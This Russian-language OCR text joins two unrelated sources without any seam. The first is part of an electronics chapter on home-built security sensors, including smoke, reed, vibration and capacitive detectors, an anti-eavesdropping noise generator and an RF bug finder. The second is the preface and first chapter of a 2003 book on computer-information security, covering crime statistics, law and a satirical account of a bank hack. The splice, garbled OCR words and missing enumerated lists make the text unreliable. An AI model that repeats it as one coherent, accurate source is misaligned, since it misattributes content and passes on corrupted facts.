Конструкция датчика (рис. 3.22) имеет рабочую зону, при попадании в которую дыма ослабляется прохождение ИК-импульсов, а если не смогли пройти несколько импульсов подряд — срабатывает датчик (что обеспечивает помехоустойчивость схемы). При этом в соединительной линии появляются импульсы тока, которые и выделяет схема контроля, приведенная на рис. 3.23.
Рис. 3.23. Схема контроля
Датчиков дыма к одному охранному шлейфу можно подключать (параллельно) много. При настройке схемы контроля • резистором R14 устанавливаем транзисторы так, чтобы VT3 и VT4 находились в запертом состоянии (светодиод HL4 не светится).
Один датчик дыма в режиме ОХРАНА потребляет ток не более 3 мА и проверен при работе в диапазоне температур от -40 до +50 °С.
Выход схемы контроля (коллектор VT4) может подключаться к системе охраны непосредственно вместо датчика.
При использовании нескольких датчиков, одновременно установленных в разных местах, схему можно дополнить индикатором номера сработавшего датчика дыма. Для этого нужно, чтобы частоты генераторов (зависит от С1 и R2) отличались друг от друга, а воспользовавшись цифровым индикатором частоты, например предложенным М. Назаровым ("Радио", N 3, 1984, стр. 29—30), легко будет определить место возгорания. При этом отпадает необходимость вести охранные шлейфы отдельно до каждого датчика, что значительно упростит разводку проводов и снизит их расход.
Транзисторы VT1 и VT2 могут быть заменены на КТ814. ИК-диоды подойдут многих других типов, но при этом может потребоваться подбор номинала резистора R6.
Конденсаторы использованы С1, С2, С4, С5 типа К10-17а, СЗ — К53- 18-16В, С6 - К50-6-16В. Резистор R14 типа СП5-2, остальные типа С2-23.
Датчик дыма целесообразно устанавливать в помещениях, где хра нятся легко воспламеняющиеся предметы, а размещать в местах, где проходит поток воздуха, например вблизи вентиляционного отверстия, - в этом случае возгорание будет обнаружено раньше.
Схема может найти и другие применения, например в качестве безконтактного датчика для охранной сигнализации или устройств автоматики.
ДАТЧИКИ ДЛЯ ОХРАННОЙ СИГНАЛИЗАЦИИ
Существует много различных видов датчиков для охранной сигнализации. Большинство из них рассматривать из-за сложности изготовления в домашних условиях мы не будем, а остановимся на наиболее простых.
Так, стекло автомобиля может охранять и обычная миниатюрная кнопка (МП-1), установленная на уголок, рис. 3.24. Крепится она к стеклу зажимом уголка под резиновую уплотнительную прокладку.
Кроме кнопок, в качестве датчиков наиболее часто применяются герметичные герконовые контакты, замыкающиеся при воздействии магнита. Они обладают высокой надежностью и малыми габаритами, что делает возможным потайное размещение в углублении на каркасе дверей и оконных рам. При этом небольшой магнит крепится на подвижной части, например клеем (рис. 3.25).
В зависимости от расположения магнита относительно геркона, датчик может работать на замыкание или размыкание цепи при срабатывании (обычно используют на размыкание).
Чувствительности контактов геркона достаточно, чтобы он срабатывал на расстоянии 5...15 мм от магнита.
Использованием только герконовых датчиков и кнопок не везде удастся обеспечить надежную охрану (окно могут разбить).
Простейшим способом сигнализации при разбивании окна является наклеенная по периметру стекла тонкая и узкая полоска из металлической фольги, включенная последовательно в цепь
Рис. 3.24
Рис. 3.25
Рис. 3.26
Рис. 3.27
охранного шлейфа (см. рис. 3.26). Она порвется при разбивании стекла, но, если вор будет использовать стеклорез, может не сработать.
Для охраны на стеклах широко используют выпускаемые промышленностью датчики ДИМК (рис, 3.27). Такой датчик клеится к стеклу и срабатывает на удары или разбивание за счет того, что пластина с закрепленным на ней магнитом не имеет жесткого крепления и при ударах отходит от геркона, что разрывает цепь охранного шлейфа (все датчики подключаются последовательно).
Аналогичную конструкцию несложно изготовить самостоятельно или приобрести.
Для сигнализации об ударах и вибрациях может использоваться также пьезосигнализатор типа В-2 (BQ1, рис. 3.28) совместно со схемой усилителя.
Этот датчик рассчитан на работу в диапазоне температур ±60 °С и приклеивается к стеклу клеем или прижимается металлической пластиной к корпусу автомобиля или гаража (рис. 3.29).
Питание схемы может быть от 5 до 15 В, а чувствительность устанавливается резистором R8 при настройке. При срабатывании сигнализатора на выходе схемы появляется кратковременно нулевой уровень. Устройство можно подключить непосредственно к схеме охраны (например приведенной на рис. 3.10).
На автомобилях для предотвращения снятия колес часто применяют датчики механических колебаний корпуса. Такой датчик несложно изготовить из пружинящей металлической пластины с закреплением на одном
Рис. 3.28. Усилитель к пьезодатчику
Рис. 3.29. Вид крепления датчика
конце груза (см. рис. 3.30), но он обладает низкой надежностью и требует частой механической подстройки чувствительности из-за разбалтывания, а также изменения погодных условий.
Чувствительность такого датчика зависит от неровности поверхности земли на месте стоянки, что нередко приводит к ложным срабатываниям или неконтролируемому снижению чувствительности.
Рис. 3.31. Усилитель к электромагнитному датчику
Рис. 3.30. Датчик механических колебании
Всех этих недостатков лишена схема с электромагнитным датчиком (рис. 3.31). В качестве чувствительного к колебаниям датчика можно использовать малогабаритный миллиамперметр (например от бытовой радиоаппаратуры, М4370 и многие другие), доработав его в соответствии с рис. 3.32. Для этого корпус измерительного прибора вскрывается и на конце стрелки закрепляется небольшой грузик (можно взять кусочек трубчатого припоя с внутренней канифолью). Канифоль удаляется иголкой, а в полученное отверстие вставляется конец стрелки и обжимается плоскогубцами.
При выборе миллиамперметра неважно, где у него начальное положение стрелки, — под действием веса груза она займет среднее положение при соответствующей ориентации самого прибора.
Рис. 3.32 Конструкция электромагнитного датчика механических колебании
Чувствительность электромагнитного датчика колебаний не зависит от неровности места, и он может срабатывать даже от легкого прикосновения к машине, а его чувствительность легко изменить резистором R5 типа СП5-2В (так, во время дождя она должна быть снижена для исключения ложных срабатываний).
Для удобства эксплуатации лучше применить два резистора R5 и тумблером переключать их на заранее установленные чувствительности. Схему усилителя к дагчику лучше располагать вблизи от датчика.
Для охраны темного подвала или погреба можно использовать датчик света (рис. 3.33). Он позволит обнаружить проникновение туда постороннего, который све^орл яавэрчяка воспользуется.
Рис. 3.33. Датчик- освещения
Резисторы, отмеченные на схемах "*", требуется подбирать при регулировке.
ЕМКОСТНОЙ ДАТЧИК
Устройство реагирует на приближение руки к металлическому предмету, например замку, сейфу, или же на касание охраняемого предмета. Датчиком может служить и любая электропроводная пластина с размерами примерно 200х200 мм. Чувствительность датчика зависит от настройки и может составлять до 20 см.
Отличительной особенностью приведенных схем емкостных датчиков является их малое потребление (работа в режиме микротоков), что позволяет применять автономное питание.
В основе работы схемы (рис. 3.34) используется принцип изменяемой емкости. При поднесении руки к датчику WA1 в колебательный контур автогенератора на транзисторе VT1 вносится емкость, и его частота меняется. Начальная частота автогенератора около 280 кГц. Схема настраивается так, чтобы второй колебательный контур (L2, С7) был в резонансе с частотой автогенератора.
На транзисторе VT4 собран активный детектор ВЧ сигнала. При достаточной амплитуде напряжения в контуре (L2, С7) VT4 будет находиться в насыщении (при этом VT5 заперт).
Рис. 3.34
Цепь из резисторов R6, R7 обеспечивает устойчивую работу схемы при изменении питающего напряжения от 3,5 до 10В. Резистором R6 можно установить нужную чувствительность датчика.
Транзисторы VT2 и VT3 используются как диоды для стабилизации режимов работы транзисторов VT1 и VT4 при изменении питающего напрядения. По сравнению с диодами переход транзистора обеспечивает лучшую стабилизацию напряжения при малых рабочих токах.
Для удобства настройки схемы к коллектору VT5 можно подключить светодиод с ограничительным резистором (величина резистора зависит от напряжения питания и может быть от 200 до 1000 Ом).
Рис. 3.35
Рис. 3.36. Топология печатной платы
Грубая настройка схемы производится конденсатором С7, плавная — сердечником катушки L2, а также резистором R6. Окончательная настройка устройства проводится с реальным датчиком WA1, с которым схема будет в дальнейшем работать. При этом если охраняемый предмет имеет большую металлическую поверхность, то может потребоваться установка разделительного конденсатора небольшой емкости (5...100 пФ) между WA1 и контактом 1 схемы.
Катушки L1, L2 намотаны на ферритовом стержне типа 600НН (или 400НН) диаметром 10 мм и длиной
55 мм (см. рис. 3.35). Такие ферриты используются в качестве антенны в приемниках на СВ и ДВ диапазонах. Катушка L1 содержит 350 витков, L2 — 250 витков провода ПЭЛШО диаметром 0,08...0,12 мм, которые распределены равномерно по бумажному каркасу на ферритовом стержне. Сердечник L2 должен перемещаться относительно каркаса.
Постоянные резисторы применены типа С2-23, подстроечный R6 — СПЗ-19а, конденсатор С10 типа К53-1, остальные конденсаторы типа К10-17.
На рис. 3.36 и 3.37 приведена конструкция печатной платы и расположение на ней элементов.
Схема датчика размещается в любом пластмассовом корпусе и крепится вблизи отдатчика WA1 (100...200 мм).
Устройство может работать совместно с другими схемами охраны в качестве датчика или как самостоятельное охранное устройство при наличии звукового индикатора (рис. 3.38).
Параметры катушек L1, L2 такие же, как в схеме, приведенной на рис. 3.34, катушка L3 намотана на двух склеенных вместе ферритовых кольцах (600...2000НН) типоразмера КЮхбхЗ и содержит 250 витков того же провода (индуктивность ее около 120 мГн).
Рис. 3.37. Расположение элементов
Принцип работы звукового генератора на транзисторах VT6 и VT7 аналогичен с приведенной схемой на рис. 4.12. В качестве источника звука HF1 подойдет любой пьезоизлучатель, но топология печатной платы (рис. 3.39) дана для установки ЗГИ 8.
На плате резисторы R1 и R2 раполагаются над конденсаторами, что увеличивает плотность монтажа, а конденсатор С10 применен типа К50-16 на 16 В.
При питании схемы от источника с напряжением 6 В ток потребления в режиме ОХРАНА не превышает 1 мА, а при звуковом сигнале — 3 мА.
Рис. 3.38
Рис. 3.39
ГЕНЕРАТОР ШУМА
Существуют специальные приборы, которые позволяют на расстоянии прослушивать разговоры через оконные стекла. При этом используется свойство звуковых волн создавать микровибрацию стекла, которую с помощью узконаправленных оптических приборов можно преобразовать в звук.
Предотвратить прослушивание деловых разговоров через окна позволяет генератор широкополосного акустического шума (рис. 3.40).
Рис. 3.40
Устройство собрано на трех КМОП микросхемах и состоит из задающего генератора на частоту 50 кГц (D1.1, D1.2), формирователя псевдослучайной последовательности импульсов на сдвигающих регистрах (D2, D3) и логике (D1.3, D1.4).
Звуковыми излучателями (HF1, HF2) являются используемые в некоторых телефонах капсули ВП-1 или ДЭМ-4М.
Резистор R4 позволяет регулировать громкость звука.
Схема может питаться от любого нестабилизированного источника с напряжением от 4 до 15 В и потребляет ток не более 20 мА.
В качестве источника звука подойдут и любые малогабаритные динамики (с 50-омным сопротивлением), но при этом возрастет потребляемый ток. Транзисторы можно заменить на КТ829А.
При правильной сборке схема настройки не требует.
Устройство выполняется в виде переносной коробки и размещается на подоконнике, вблизи от стекла. Включать генератор шума можно при проведении деловых переговоров, в случае необходимости.
РАДИОЧАСТОТНЫЙ ИСКАТЕЛЬ ПОДСЛУШИВАЮЩИХ УСТРОЙСТВ
Сегодня каждый может приобрести или собрать самостоятельно радиомикрофон, а также телефонное радиопрослушивающее устройство. Если вы занимаетесь бизнесом, то иногда необходима уверенность в том, что ваш разговор в квартире или офисе не прослушивается. Ведь от соблюдения коммерческой тайны часто зависит успех дела.
Обычно радиоподслушивающие устройства ("жучки") излучают на одной частоте в диапазоне 30...500 МГц небольшую мощность (до 5 мВт). Инода такие устройства работают в ждущем режиме: включаются на передачу при наличии шума в помещении (что обеспечивает экономичность расходования энергии элементов питания) или же при снятии телефонной трубки. "Жучки" могут иметь постоянное питание от сети 220 В — в этом случае они располагаются внутри розеток или переходных тройников.
Услуги специалистов по поиску таких закладок стоят довольно дорого. Самостоятельно разбирать и осматривать все электроприборы — займет очень много времени и не гарантирует успех (электрическую лампочку не разберешь, а в ней может находиться радиомикрофон).
Рис. 3.41
Простейшее устройство, которое способно вам помочь в обнаружении подслушивающих устройств, приведено на рис. 3.41.
Схема является широкополосным мостовым детектором ВЧ напряжения, который перекрывает диапазон частот 1...200 МГц (при использовании в качестве VD1...VD6 диодов СВЧ диапазона рабочая полоса может быть расширена) и позволяет обнаруживать "жучки" на расстоянии примерно 0,5...1 м (это зависит от мощности передатчика).
Известно, что измерение ВЧ напряжений с уровнем меньше 0,5 В затруднено тем, что уже при 0,2...0,3 В все полупроводниковые диоды при детектировании становятся неэффективны из-за особенности их вольт-амперной характеристики.
В данной схеме применен известный способ измерения малых переменных напряжений с использованием сбалансированного диодно- резистивного моста. Небольшой ток, протекающий через диоды VD3, VD4, улучшает условия детектирования (повышает чувствительность) и позволяет отодвинуть нижнюю границу уровня измеряемых напряжений до 20 мВ при равномерной амплитудно-частотной характеристике.
Диоды VD5, VD6 образуют второе плечо моста и обеспечивают термостабилизацию схемы. На элементах микросхемы D1.2...D1.4 собраны трехуровневые компараторы, к выходам которых подключены светодиодные индикаторы HL1...HL3.
Диоды VD1, VD2 применены как стабилизаторы напряжения 1,4 В, что необходимо для устойчивой работы схемы в широком диапазоне изменения питающих напряжений.
Применение устройства требует определенных навыков, так как схема довольно чувствительна и способна улавливать вблизи любые радиоизлучения, например работу гетеродина приемника или телевизора, а также вторичное переизлучение токопроводящими поверхностями.
Для облегчения поиска "жучка" используют сменные антенные штыри с разной длиной (рис. 3.42), которые позволяют снизить чувствительность схемы.
Рис. 3.42
При использовании устройства, после его включения, необходимо резистором R2 добиться свечения индикатора HL3. Этим мы устанавливаем уровень начальной чувствительности относительно фона. При поднесении антенны к источнику радиоизлучения должны начинать светиться светодиоды HL2 и HL1 по мере увеличения амплитуды принятого сигнала.
Регулировку схемы подстроечным резистором R9 выполняют один раз (при первоначальной настройке устройства от него зависит уровень порогов чувствительности компараторов).
Питается схема от аккумулятора 7Д-0.125Д или батарейки типа "Крона" и сохраняет работоспособность при изменении питания от 6 до 10В.
В схеме применены: переменные резисторы R2 типа СПЗ-36 (многооборотный), R9 типа СПЗ-19а, остальные резисторы — типа С2-23; конденсаторы С1...С4 типа К10-17; гнездо Х1 типа Г4,0, выключатель S1 типа ПД-9-2.
Светодиоды можно заменить на любые из серии КИП (при малом потребляемом токе они светятся достаточно ярко).
Конструктивное выполнение схемы может быть любым, например в виде записной книжки (при использовании плоских аккумуляторов).
Автор: Борис Анин, "Защита компьютерной информации".
Издательство "BHV-СПб", 2003
Предисловие
Люди, уходя из дома, обычно закрывают входную дверь на замок. Они также запирают свои автомобили, оставляя их припаркованными на улице иди на стоянке. И, как правило, не сообщают номер своей кредитной карты первому встречному коробейнику, который пристает к прохожим па удине. настырно предлагая купить у него товары сомнительного качества. Однако подавляющее большинство людей до конца не осознает, насколько сильно они рискуют, если не заботятся о защите информации, находящейся в их компьютерах.
Достоверно известно, что лишь отдельные пользователи предпринимают хоть какие-то меры, призванные сберечь их данные. Остальные всерьез задумываются об этом только тогда, когда теряют информацию, хранимую в компьютере. Более того, их компьютерные системы зачастую совершенно не защищены от краж и вандализма.
Каждый раз, используя свой компьютер, его владелец добавляет туда определенную порцию информации. Именно эта совокупная информация и является наиболее ценным компонентом всей компьютерной системы. А это значит, что если не предпринять специальных мер для ее зашиты, издержки, которые понесет пользователь, попытавшись восстановить утраченные данные, значительно превысят стоимость аппаратных средств, используемых для хранения этих данных. Еще более чреватой опасными последствиями является ситуация, при которой налоговая и банковская информация пользователя или его деловая переписка попадает в чужие руки. Трудно себе вообразить, что кто-то, находясь в здравом уме и твердой памяти, по доброй воле предоставляет свою личную информацию людям, с которыми не имеет или не желает иметь никаких дел.
Но даже если вам нечего скрывать от посторонних (в это трудно поверни,. но предположим, что это действительно так), непременно отыщется кто-нибудь, кто не прочь превратить ваш компьютер в груду бесполезною хлама, как только представится такая возможность. Расплодившиеся киберпанки, крэкеры, фрикеры и брейкеры с большим энтузиазмом занимаются электронным воровством, что можно сравнить с осквернением могил и разрисовыванием стен зданий неприличными надписями.
Не следует пренебрегать и защитой данных от стихийных бедствии. Ведь совершенно не важно, испортится ваш жесткий диск от компьютерною вируса, от рук злобного хакера, или ту же самую медвежью услугу вам окажет ураган, наводнение либо шаровая молния.
Не менее важно отметить, что вне зависимости от того, насколько ценна ваша информация, российским законодательством она безусловно признается объектом вашей собственности. И вы, как владелец своей информации. имеете право определять правила ее обработки и зашиты. Базовым в этом отношении является Закон Российской Федерации "Об информации, информатизации и защите информации", принятый 25 января 1995 г. В соответствии с ним любой российский гражданин может предпринимать необходимые меры для предотвращения утечки, хищения, утраты, искажения и подделки информации. Вопрос состоит в том, какие действия являются на самом деле необходимыми для адекватной защиты вашей информации.
Рискну предположить, что вы вряд ли покидаете свой дом даже на короткое время без того, чтобы не запереть дверь, хотя это довольно .хлопотное занятие. Во-первых, необходимо обладать минимумом технических знаний, чтобы подобрать и установить надежный замок. Во-вторых, требуется постоянный контроль за состоянием замка, чтобы содержать его в исправности. В-третьих, чтобы замок предотвращал проникновение в дом посторонних людей, вы должны соблюдать определенные правила (хранить ключи в надежном месте, а также не оставлять дверь незапертой). Подобные же правила применимы и в случае защиты информации в компьютерных системах. Именно поэтому так важно отыскать разумный компромисс между ценностью ваших данных и неудобствами, связанными с использованием необходимых мер безопасности.
Как и дверной замок, любая система компьютерной защиты информации не является полностью безопасной. Всегда найдется кто-нибудь, способный взломать защитные механизмы компьютера. К счастью, такие люди встречаются очень редко, иначе единственный способ защитить наши данные состоял бы в их уничтожении.
Таким образом, задача обеспечения информационной безопасности противоречива по самой своей сути. С одной стороны, средств обеспечения безопасности никогда не бывает слишком много в том смысле, что защиту всегда можно тем или иным способом преодолеть (просто каждый раз, когда повышается уровень защиты, приходится придумывать более изощренный способ ее обхода). С другой стороны, чем сильнее кого-то или что-то защищают, тем больше возникает неудобств и ограничений, и в результате вместо чувства спокойствия информационная защита вызывает лишь раздражение и стремление от нее отмахнуться, как от надоедливой мухи. Например, за счет жесткого контроля за доступом к компьютерной системе с помощью паролей несомненно снижается вероятность их подбора взломщиком, однако одновременно это заставляет рядовых пользователей прилагать значительно больше усилий для придумывания и запоминания паролей. А установка строгих ограничений на доступ к информации создает дополнительные трудности при совместной работе с этой информацией. Поэтому идеальной и универсальной системы защиты информации не существует: здесь все слишком индивидуально, и вариант защиты, наиболее близкий к Оптимальному, все время приходится подбирать заново.
Внимательно изучив предлагаемую вашему вниманию книгу, вы сможете подобрать оптимальные методы для защиты компьютерной информации. При этом очень существенную роль будет играть степень изолированности вашего компьютера от внешнего мира.
Если компьютер находится у вас дома или в офисе и физически не связан с другими компьютерами (с помощью модема или аппаратной сети), то, по всей вероятности, самая большая опасность состоит в том, что кто-то занесет в него вирус или троянскую программу. Вторая, крайне неблагоприятная перспектива, заключается в том, что ваш компьютер может быть похищен. Остальных неприятностей можно избежать, применяя парольную защиту компьютера и шифруя файлы, содержащие конфиденциальную информацию. В этом случае снабдить свой компьютер довольно надежной защитой сможет любой человек, даже не очень сведущий в вопросах информационной безопасности.
Если компьютерная система подключена к сети, то потребуется принять дополнительные меры безопасности, квалифицированно установить и правильно использовать которые под силу только подготовленному специалисту, имеющему опыт работы в области зашиты информации. Зашитые механизмы, встроенные в сетевые операционные системы, всевозможные брандмауэры и анализаторы безопасности сетей требуют очень гонкой па-стройки. Поэтому даже незначительная ошибка при их установке и настройке чревата серьезными последствиями, поскольку злоумышленнику достаточно обнаружить всего лишь одно слабое место в системе защиты, чтобы осуществить ее взлом. Однако и в случае, если компьютер работает и составе сети, изучение предлагаемой книги будет полезно всем — от технаря до менеджера, не имеющего глубоких познаний в этих вопросах. Ведь правильное использование средств зашиты информации возможно лишь в том случае, когда все люди, так или иначе причастные к работе со среда вами обработки и хранения данных, осознают (пусть даже в самых общих чертах) принципы обеспечения надежного функционирования этих средств и скрупулезно следуют данным принципам на практике.
Глава 1. Угрозы компьютерной безопасности
Компьютерная преступность в России
В странах, где высок уровень компьютеризации, проблема борьбы с компьютерной преступностью уже довольно давно стала одной из первостепенных. И это не удивительно. Например, в США ущерб от компьютерных преступлений составляет ежегодно около 5 млрд долларов, во Франции эти потери доходят до 1 млрд франков в год, а в Германии при помощи компьютеров преступники каждый год ухитряются похищать около 4 млрд марок. И число подобных преступлений увеличивается ежегодно на 30— 4()°с.
Поскольку Россия никогда не входила (и в ближайшем будущем вряд ли войдет) в число государств с высоким уровнем компьютеризации (на большей части ее территории отсутствуют разветвленные компьютерные сети и далеко не везде методы компьютерной обработки информации пришли па смену традиционным), то довольно долго российское законодательство демонстрировало чрезмерно терпимое отношение к компьютерным преступлениям. Положительные сдвиги произошли только после ряда уголовных дел, самым громким из которых стало дело одного из программистов Волжского автомобильного завода, умышленно внесшего деструктивные изменения в программу, которая управляла технологическим процессом. что нанесло заводу значительный материальный ущерб. Отечественное законодательство претерпело существенные изменения, в результате которых был выработан ряд законов, устанавливающих нормы использования компьютеров в России.
Главной вехой в цепочке этих изменений стало введение в действие 1 января 1997г. нового Уголовного кодекса. В нем содержится глава "Преступления в сфере компьютерной информации", где перечислены следующие преступления:
Отметим, что уголовная ответственность за перечисленное наступает только в том случае, когда уничтожена, блокирована, модифицирована пли скопирована информация, хранящаяся в электронном виде. Таким образом, простое несанкционированное проникновение в чужую информационную систему без каких-либо неблагоприятных последствии наказанию не подлежи i. Сравните: вторжение в квартиру, дом или офис против воли их владельца однозначно квалифицируется как уголовно наказуемое действие вне зависимости от последствий.
Следует сказать, что наличие законодательства, регламентирующего ответственность за компьютерные преступления, само по себе не является показателем степени серьезности отношения общества к таким преступлениям. К примеру, в Англии полное отсутствие специальных законов, карающих именно за компьютерные преступления, на протяжении многих лет отнюдь не мешает английской полиции эффективно расследовать дела такого рода. И действительно, все эти злоупотребления можно успешно квалифицировать по действующему законодательству, исходя из конечного результата преступной деятельности (хищение, вымогательство, мошенничество или хулиганство). Ответственность за них предусмотрена уголовным и гражданским кодексами. Ведь убийство и есть убийство, вне зависимости от того. что именно послужило орудием для него.
По данным Главного информационного центра МВД России в 1997 г. доля компьютерных преступлений составила 0,02% от общего числа преступлений в области кредитно-финансовой сферы. В абсолютных цифрах общее количество компьютерных преступлений в этом году превысило сотню, а суммарный размер ущерба —20 млрд рублей.
Однако к этой статистике следует относиться осторожно. Дело в том, что долгое время в правоохранительных органах не было полной ясности относительно параметров и критериев, по которым следовало фиксировать совершенные компьютерные преступления, а также попытки их совершить. Можно предположить, что данные, учтенные официальной статистикой. составляют лишь вершину айсберга, подводная часть которого представляет существенную угрозу обществу. И для этого имеются серьезные основания.
Российским правоохранительным органам становятся известны не более 5— 10% совершенных компьютерных преступлений. Их раскрываемость тоже не превышает 1—5%. Это связано с тем, что хищение информации долгое время может оставаться незамеченным, поскольку зачастую данные просто копируются. Жертвы компьютерной преступности (большинство среди них — частные предприятия) проявляют нежелание контактировать с правоохранительными органами, опасаясь распространения среди вкладчиков и акционеров сведений о собственной халатности и ненадежной работе своей фирмы, что может инициировать отток финансов и последующее банкротство.
Тенденции
По свидетельству экспертов самым привлекательным сектором российской экономики для преступников является кредитно-финансовая система. Анализ преступных деяний, совершенных в этой сфере с использованием компьютерных технологий, а также неоднократные опросы представителей банковских учреждений позволяют выделить следующие наиболее типичные способы совершения преступлений:
Уникальность сети Internet заключается в том, что она не находится во владении какого-то физического лица, частной компании, государственного ведомства или отдельной страны. Поэтому практически во всех ее сегментах отсутствует централизованное регулирование, цензура и другие методы контроля информации. Благодаря этому открываются практически неограниченные возможности доступа к любой информации, которые используются преступниками. Сеть Internet можно рассматривать не только как инструмент совершения компьютерных преступлений, но и как среда для ведения разнообразной преступной деятельности.
При использовании сети Internet в качестве среды для преступной деятельности привлекательной для правонарушителей является сама возможность обмена информацией криминального характера. Применять в своей деятельности коммуникационные системы, обеспечивающие такую же оперативную и надежную связь по всему миру, раньше были в состоянии только спецслужбы сверхдержав — Америки и России, которые обладали необходимыми космическими технологиями.
Другая особенность сети Internet, которая привлекает преступников, — возможность осуществлять в глобальных масштабах информационно-психологическое воздействие на людей. Преступное сообщество весьма заинтересовано в распространении своих доктрин и учений, в формировании общественного мнения, благоприятного для укрепления позиций представителей преступного мира, и в дискредитации правоохранительных органов.
Однако наибольший интерес сеть Internet представляет именно как орудие для совершения преступлений (обычно в сфере экономики и финансов). В самом простом варианте эти преступления связаны с нарушением авторских прав. К такого рода преступлениям, в первую очередь, относится незаконное копирование и продажа программ, находящихся на серверах компаний, которые являются владельцами этих программ.
Во вторую группу преступлений можно включить нелегальное получение товаров и услуг, в частности, бесплатное пользование услугами, предоставляемыми за плату различными телефонными компаниями, за счет отличных знаний принципов функционирования и устройства современных автоматических телефонных станций. Другие способы незаконного пользования услугами основываются на модификации сведений о предоставлении этих услуг в базах данных компаний, которые их оказывают. Информация о предоставлении какой-то услуги в кредит может либо просто уничтожаться. либо изменяться для того, чтобы потребителем уже оплаченной кем-то услуги стал член преступного сообщества.
Наряду с нелегальным получением товаров и услуг интерес для преступных группировок представляют такие сферы мошеннической деятельности, как азартные игры (казино, лотереи и тотализаторы), организация финансовых пирамид, фиктивных брачных контор и фирм по оказанию мифических услуг. Во всех случаях оперативность взаимодействия с жертвами мошенничества и анонимность самого мошенника весьма привлекательны при совершении компьютерных преступлений в сети Internet.
Одна из предпосылок повышенного интереса, который преступники проявляют к сети Internet, заключается в том, что с развитием компьютерных сетей информация становится все более ценным товаром. Особенно это касается информации, имеющей отношение к банковской сфере — данные о вкладах и вкладчиках, финансовом положении банка и клиентов, кредитной и инвестиционной политике банка, а также о направлениях его развития. Поскольку в современных условиях субъекты кредитно-финансовой деятельности не могут существовать без взаимного информационного обмена, а также без общения со своими территориально удаленными филиалами и подразделениями, то часто для этих целей они используют Internet. А это значит, что у преступников появляется реальный шанс получить доступ к сугубо секретной информации о потенциальных объектах своей преступниц деятельности. Уничтожение такой информации преступниками является разновидностью недобросовестной конкуренции со стороны предприятий. которые находятся под "крышей" этих преступников. Даже одна угроза ее уничтожения может сама по себе послужить эффективным средством воздействия на руководство банка с целью вымогательства или шантажа.
Через Internet преступники стремятся также получить возможность нужным для себя образом модифицировать конфиденциальную служебную информацию, которая используется руководством банка для принятия каких-либо важных решений. Дело в том, что ввиду высокой трудоемкости оценки степени доверия к потенциальному получателю банковского кредита в большинстве банков промышленно-развитых стран эта операция автоматизирована. В секрете держатся не только исходные данные для принятия подобных решений, но и сами алгоритмы их выработки. Нетрудно догадаться, какими могут быть последствия, если такие алгоритмы знают посторонние лица, которые могут оказаться в состоянии модифицировать их так. чтобы они вырабатывали благоприятные для этих лиц решения.
Дополнительная сфера компьютерных преступлений, совершаемых через Internet, появилась с возникновением электронных банковских расчетов. т. е. с введением в обращение так называемой электронной наличности. Есть разные способы ее хищения, но все они основываются на модификации информации, отображающей электронную наличность. Информация о наличности, имеющейся на счетах клиентов, переписывается на счета, которыми безраздельно распоряжаются преступники. Изменения также могут быть внесены в сам алгоритм, определяющий правила функционирования системы обработки информации об электронных банковских расчетах. Например, меняется курс валют, чтобы для клиентов банка валюта пересчитывалась по заниженному курсу, а разница зачислялась на счета преступников.
Синдром Робина Гуда
В 1998 г. в Экспертно-криминалистическом центре МВД была проведена классификация компьютерных преступников. Обобщенный портрет отечественного хакера, созданный на основе этого анализа, выглядит примерно так:
По сведениям того же Экспертно-криминалистического центра МВД, принципиальная схема организации взлома защитных механизмов банковской информационной системы заключается в следующем. Профессиональные компьютерные взломщики обычно работают только после тщательной предварительной подготовки. Они снимают квартиру на подставное лицо в доме. в котором не проживают сотрудники спецслужб или городской телефонной сети. Подкупают сотрудников банка, знакомых с деталями электронных платежей и паролями, и работников телефонной станции, чтобы обезопаситься на случай поступления запроса от службы безопасности банка. Нанимают охрану из бывших сотрудников МВД. Чаше всего взлом банковской компьютерной сети осуществляется рано утром, когда дежурный службы безопасности теряет бдительность, а вызов помощи затруднен.
Компьютерные преступления парадоксальны тем, что в настоящее время трудно найти другой вид преступления, после совершения которою его жертва не выказывает заинтересованности в поимке преступника, а сам преступник, будучи пойман, рекламирует свою деятельность на поприще компьютерного взлома, мало что утаивая от представителей правоохранительных органов. Этот парадокс вполне объясним:
Таким образом, для общественного мнения в России характерен "синдром Робина Гуда" — преступники-хакеры представляются некими благородным;; борцами против толстосумов-банкиров. А посему хакерство в России, по видимому, просто обречено на дальнейшее развитие.
Суммируя информацию о компьютерных взломах, которая время от времени появляется в отечественной прессе, можно привести следующее обобщенное (так сказать, "среднеарифметическое") описание одного такого взлома. И если в этом описании кто-то увидит определенные преувеличения пли несуразности, то их следует отнести на счет воспаленного воображения некоторых российских журналистов, явно страдающих "синдромом Робина Гуда" в особо тяжелой форме.
История одного компьютерного взлома
В назначенный день около восьми часов вечера все участники планировавшегося взлома компьютерной защиты одного из банков собрались в довольно просторной московской квартире, которая за 3 месяца до начала операции была снята на подставное имя в неприметном доме на тихой улице. Дом был выбран отнюдь не случайно: они выяснили, что в этом ломе не проживают сотрудники правоохранительных органов, спецслужб, налоговой полиции и городских телефонных станций, дипломаты, депутаты, террористы, киберпанки и резиденты иностранных разведок.
Одновременно со взломщиками на "боевое" дежурство заступили подкупленный служащий местной телефонной станции, который на запрос об определении номера телефона квартиры, откуда осуществлялся взлом, должен был сообщить "липовый" номер телефона, и высокопоставленный агент в российских ракетно-космических войсках, который в случае неудачного взлома пообещал организовать нанесение ракетного удара для уничтожения банка, телефонной станции и штаб-квартиры взломщиков с целью замести следы преступления.
У подъезда дома стоял ничем не примечательный шестисотый "Мерседес", в котором сидели два представителя заказчика— крупной московской бандитской группировки. Один банк "кинул" дружественную группировке коммерческую фирму на очень большую сумму. Этот банк было решено наказать, запустив в его компьютерную сеть зловредный вирус, который должен был минимум на сутки вывести из строя все банковские коммуникации, включая электрическую, газовую, водопроводную и канализационную ее и,. а также мусоропровод.
Главарь банды взломщиков провел инструктаж о бережном обращении с казенным имуществом, раздал компьютеры, бронежилеты, рации и сообщил позывные.
Временная штаб-квартира взломщиков была оснащена по последнем} слову техники. На телефонную линию установлено устройство для противодействия подслушиванию. Окна и двери залиты эпоксидной смолой, чтобы не подглядывали соседи. Вся аппаратура подключена к мощным аккумуляторам, чтобы случайные перебои в электропитании не смогли помешать взлому. А сами компьютеры густо посыпаны средством против тараканов и мышей, чтобы исключить непредвиденные сбои в работе оборудования.
Подготовительный этап операции, основная задача которого состояла в подборе входных паролей, начался в 9 часов вечера и продолжался вею ночь, пока в 6 часов утра в штаб-квартире не раздался телефонный звонок. Звонил подкупленный работник банка, который сообщил пароли для входа в банковскую компьютерную сеть.
